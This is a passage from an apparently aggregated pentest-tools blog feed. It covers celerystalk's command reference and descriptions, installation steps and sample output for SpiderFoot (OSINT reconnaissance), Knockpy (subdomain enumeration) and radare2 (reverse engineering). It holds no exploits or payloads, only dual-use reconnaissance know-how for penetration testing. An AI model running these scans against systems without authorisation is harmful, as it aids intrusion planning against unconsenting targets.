-f <file> -t 10.0.0.0/24 celerystalk scan -f <file> -t sub.domain.com Simulation mode: celerystalk scan -f <file> -s Rescan Rescan all hosts: celerystalk rescan Rescan some hosts celerystalk rescan-t 1.2.3.4,sub.domain.com Simulation mode: celerystalk rescan -s Query Mode All tasks: celerystalk query Update status every 2s: celerystalk query watch Show only 5 tasks per mode: celerystalk query brief Show stats only celerystalk query summary Show stats every 2s: celerystalk query summary watch Job Control (cancel/pause/resume) Specific tasks: celerystalk cancel 5,6,10-20 celerystalk pause 5,6,10-20 celerystalk resume 5,6,10-20 All tasks current worspace: celerystalk cancel all celerystalk pause all celerystalk resume all Access the DB Show workspaces: celeryststalk db workspaces Show services: celeryststalk db services Show hosts: celeryststalk db hosts Show vhosts only celeryststalk db vhosts Show paths: celeryststalk db paths Export DB Export current DB: celerystalk db exportCreditThis project was inspired by many great tools:https://github.com/codingo/Reconnoitre by @codingo_https://github.com/frizb/Vanquish by @frizbhttps://github.com/leebaird/discover by @discoverscriptshttps://github.com/1N3/Sn1perhttps://github.com/SrFlipFlop/Network-Security-Analysis by @SrFlipFlopThanks to @offensivesecurity and @hackthebox_eu for their lab networksAlso, thanks to:@decidedlygray for pointing me towards celery, helping me solve python problems that were over my head, and for the extensive beta testing@kerpanic for inspiring me to dust off an old project and turn it into celerystalkMy TUV OpenSky team and my IthacaSec hackers for testing this out and submitting bugs and featuresDownload Celerystalk

Link: http://feedproxy.google.com/~r/PentestTools/~3/9zxM11uFyz8/celerystalk-asynchronous-enumeration.html

SpiderFoot – The Most Complete OSINT Collection And Reconnaissance Tool

SpiderFoot is an open source intelligence (OSINT) automation tool. Its goal is to automate the process of gathering intelligence about a given target, which may be an IP address, domain name, hostname, network subnet, ASN or person’s name.SpiderFoot can be used offensively, i.e. as part of a black-box penetration test to gather information about the target or defensively to identify what information your organisation is freely providing for attackers to use against you.What is SpiderFoot?SpiderFoot is a reconnaissance tool that automatically queries over 100 public data sources (OSINT) to gather intelligence on IP addresses, domain names, e-mail addresses, names and more. You simply specify the target you want to investigate, pick which modules to enable and then SpiderFoot will collect data to build up an understanding of all the entities and how they relate to each other.What is OSINT?OSINT (Open Source Intelligence) is data available in the public domain which might reveal interesting information about your target. This includes DNS, Whois, Web pages, passive DNS, spam blacklists, file meta data, threat intelligence lists as well as services like SHODAN, HaveIBeenPwned? and more. See the full list of data sources SpiderFoot utilises.What can I do with SpiderFoot?The data returned from a SpiderFoot scan will reveal a lot of information about your target, providing insight into possible data leaks, vulnerabilities or other sensitive information that can be leveraged during a penetration test, red team exercise or for threat intelligence. Try it out against your own network to see what you might have exposed!Read more at the project website: http://www.spiderfoot.netDownload Spiderfoot

Link: http://www.kitploit.com/2018/12/spiderfoot-most-complete-osint.html

Knock v.4.1.1 – Subdomain Scan

Knockpy is a python tool designed to enumerate subdomains on a target domain through a wordlist. It is designed to scan for DNS zone transfer and to try to bypass the wildcard DNS record automatically if it is enabled. Now knockpy supports queries to VirusTotal subdomains, you can setting the API_KEY within the config.json file.Very simply$ knockpy domain.comExport full report in JSONIf you want to save full log like this one just type:$ knockpy domain.com –json InstallPrerequisitesPython 2.7.6DependenciesDnspython$ sudo apt-get install python-dnspythonInstalling$ git clone https://github.com/guelfoweb/knock.git$ cd knock$ nano knockpy/config.json <- set your virustotal API_KEY$ sudo python setup.py installNote that it's recommended to use Google DNS: 8.8.8.8 and 8.8.4.4 Knockpy arguments$ knockpy -husage: knockpy [-h] [-v] [-w WORDLIST] [-r] [-c] [-j] domain___________________________________________knock subdomain scanknockpy v.4.1Author: Gianni 'guelfoweb' AmatoGithub: https://github.com/guelfoweb/knock___________________________________________positional arguments: domain target to scan, like domain.comoptional arguments: -h, --help show this help message and exit -v, --version show program's version number and exit -w WORDLIST specific path to wordlist file -r, --resolve resolve ip or domain name -c, --csv save output in csv -f, --csvfields add fields name to the first row of csv output file -j, --json export full report in JSONexample: knockpy domain.com knockpy domain.com -w wordlist.txt knockpy -r domain.com or IP knockpy -c domain.com knockpy -j domain.comFor virustotal subdomains support you can setting your API_KEY in the config.json file. ExampleSubdomain scan with internal wordlist$ knockpy domain.comSubdomain scan with external wordlist$ knockpy domain.com -w wordlist.txtResolve domain name and get response headers$ knockpy -r domain.com [or IP]+ checking for virustotal subdomains: YES[ "partnerissuetracker.corp.google.com", "issuetracker.google.com", "r5---sn-ogueln7k.c.pack.google.com", "cse.google.com", .......too long....... "612.talkgadget.google.com", "765.talkgadget.google.com", "973.talkgadget.google.com"]+ checking for wildcard: NO+ checking for zonetransfer: NO+ resolving target: YES{ "zonetransfer": { "enabled": false, "list": [] }, "target": "google.com", "hostname": "google.com", "virustotal": [ "partnerissuetracker.corp.google.com", "issuetracker.google.com", "r5---sn-ogueln7k.c.pack.google.com", "cse.google.com", "mt0.google.com", "earth.google.com", "clients1.google.com", "pki.google.com", "www.sites.google.com", "appengine.google.com", "fcmatch.google.com", "dl.google.com", "translate.google.com", "feedproxy.google.com", "hangouts.google.com", "news.google.com", .......too long....... "100.talkgadget.google.com", "services.google.com", "301.talkgadget.google.com", "857.talkgadget.google.com", "600.talkgadget.google.com", "992.talkgadget.google.com", "93.talkgadget.google.com", "storage.cloud.google.com", "863.talkgadget.google.com", "maps.google.com", "661.talkgadget.google.com", "325.talkgadget.google.com", "sites.google.com", "feedburner.google.com", "support.google.com", "code.google.com", "562.talkgadget.google.com", "190.talkgadget.google.com", "58.talkgadget.google.com", "612.talkgadget.google.com", "765.talkgadget.google.com", "973.talkgadget.google.com" ], "alias": [], "wildcard": { "detected": {}, "test_target": "eqskochdzapjbt.google.com", "enabled": false, "http_response": {} }, "ipaddress": [ "216.58.205.142" ], "response_time": "0.0351989269257", "http_response": { "status": { "reason": "Found", "code": 302 }, "http_headers": { "content-length": "256", "location": "http://www.google.it/?gfe_rd=cr&ei=60WIWdmnDILCXoKbgfgK", "cache-control": "private", "date": "Mon, 07 Aug 2017 10:50:19 GMT", "referrer-policy": "no-referrer", "content-type": "text/html; charset=UTF-8" } }}Save scan output in CSV$ knockpy -c domain.comExport full report in JSON$ knockpy -j domain.com Talk aboutEthical Hacking and Penetration Testing Guide Book by Rafay Baloch.Knockpy comes pre-installed on the following security distributions for penetration test:BackBox LinuxPentestBox for WindowsBuscador Investigative Operating System OtherThis tool is currently maintained by Gianni 'guelfoweb' Amato, who can be contacted at guelfoweb@gmail.com or twitter @guelfoweb. Suggestions and criticism are welcome.Download Knock

Link: http://www.kitploit.com/2018/12/knock-v411-subdomain-scan.html

Radare2 – Unix-Like Reverse Engineering Framework And Commandline Tools Security

r2 is a rewrite from scratch of radare in order to provide a set of libraries and tools to work with binary files.Radare project started as a forensics tool, a scriptable command-line hexadecimal editor able to open disk files, but later added support for analyzing binaries, disassembling code, debugging programs, attaching to remote gdb servers…radare2 is portable.Architecturesi386, x86-64, ARM, MIPS, PowerPC, SPARC, RISC-V, SH, m68k, AVR, XAP, System Z, XCore, CR16, HPPA, ARC, Blackfin, Z80, H8/300, V810, V850, CRIS, XAP, PIC, LM32, 8051, 6502, i4004, i8080, Propeller, Tricore, Chip8 LH5801, T8200, GameBoy, SNES, MSP430, Xtensa, NIOS II, Dalvik, WebAssembly, MSIL, EBC, TMS320 (c54x, c55x, c55+, c66), Hexagon, Brainfuck, Malbolge, DCPU16.File FormatsELF, Mach-O, Fatmach-O, PE, PE+, MZ, COFF, OMF, TE, XBE, BIOS/UEFI, Dyldcache, DEX, ART, CGC, Java class, Android boot image, Plan9 executable, ZIMG, MBN/SBL bootloader, ELF coredump, MDMP (Windows minidump), WASM (WebAssembly binary), Commodore VICE emulator, Game Boy (Advance), Nintendo DS ROMs and Nintendo 3DS FIRMs, various filesystems.Operating SystemsWindows (since XP), GNU/Linux, OS X, [Net|Free|Open]BSD, Android, iOS, OSX, QNX, Solaris, Haiku, FirefoxOS.BindingsVala/Genie, Python (2, 3), NodeJS, Lua, Go, Perl, Guile, PHP, Newlisp, Ruby, Java, OCaml…Dependenciesradare2 can be built without any special dependency, just get a working toolchain (gcc, clang, tcc…) and use make.Optionally you can use libewf for loading EnCase disk images.To build the bindings you need latest valabind, g++ and swig2.InstallThe easiest way to install radare2 from git is by running the following command:$ sys/install.shIf you want to install radare2 in the home directory without using root privileges and sudo, simply run:$ sys/user.shBuilding with meson + ninjaIf you don’t already have meson and ninja, you can install them with your distribution package manager or with r2pm:$ r2pm -i mesonIf you already have them installed, you can run this line to compile radare2:$ python ./sys/meson.py –prefix=/usr –shared –installThis method is mostly useful on Windows because the initial building with Makefile is not suitable. If you are lost in any way, just type:$ python ./sys/meson.py –helpUpdateTo update Radare2 system-wide, you don’t need to uninstall or pull. Just re-run:$ sys/install.shIf you installed Radare2 in the home directory, just re-run:$ sys/user.shUninstallIn case of a polluted filesystem, you can uninstall the current version or remove all previous installations:$ make uninstall$ make purgeTo remove all stuff including libraries, use$ make system-purgePackage managerRadare2 has its own package manager – r2pm. Its packages repository is on GitHub too. To start to using it for the first time, you need to initialize packages:$ r2pm initRefresh the packages database before installing any package:$ r2pm updateTo install a package, use the following command:$ r2pm install [package name]BindingsAll language bindings are under the r2-bindings directory. You will need to install swig and valabind in order to build the bindings for Python, Lua, etc..APIs are defined in vapi files which are then translated to swig interfaces, nodejs-ffi or other and then compiled.The easiest way to install the python bindings is to run:$ r2pm install lang-python2 #lang-python3 for python3 bindings$ r2pm install r2api-python$ r2pm install r2pipe-pyIn addition there are r2pipe bindings, which is an API interface to interact with the prompt, passing commands and receivent the output as a string, many commands support JSON output, so its integrated easily with many languages in order to deserialize it into native objects.$ npm install r2pipe # NodeJS$ gem install r2pipe # Ruby$ pip install r2pipe # Python$ opam install radare2 # OCamlAnd also for Go, Rust, Swift, D, .NET, Java, NewLisp, Perl, Haskell, Vala, OCaml, and many more to come!Regression TestsuiteRunning make tests will fetch the radare2-regressions repository and run all the tests in order to verify that no changes break any functionality.We run those tests on every commit, and they are also executed with ASAN and valgrind on different platforms to catch other unwanted ‘features’.DocumentationThere is no formal documentation of r2 yet. Not all commands are compatible with radare1, so the best way to learn how to do stuff in r2 is by reading the examples from the web and appending ‘?’ to every command you are interested in.Commands are small mnemonics of few characters and there is some extra syntax sugar that makes the shell much more pleasant for scripting and interacting with the APIs.You could also checkout the radare2 book.Webserverradare2 comes with an embedded webserver which serves a pure html/js interface that sends ajax queries to the core and aims to implement an usable UI for phones, tablets and desktops.$ r2 -c=H /bin/lsTo use the webserver on Windows, you require a cmd instance with administrator rights. To start the webserver, use the following command in the project root.> radare2.exe -c=H rax2.exePointersWebsite: https://www.radare.org/IRC: irc.freenode.net #radareTelegram: https://t.me/radareMatrix: @radare2:matrix.orgTwitter: @radareorgDownload Radare2

Link: http://feedproxy.google.com/~r/PentestTools/~3/d_ECVYw56ug/radare2-unix-like-reverse-engineering.html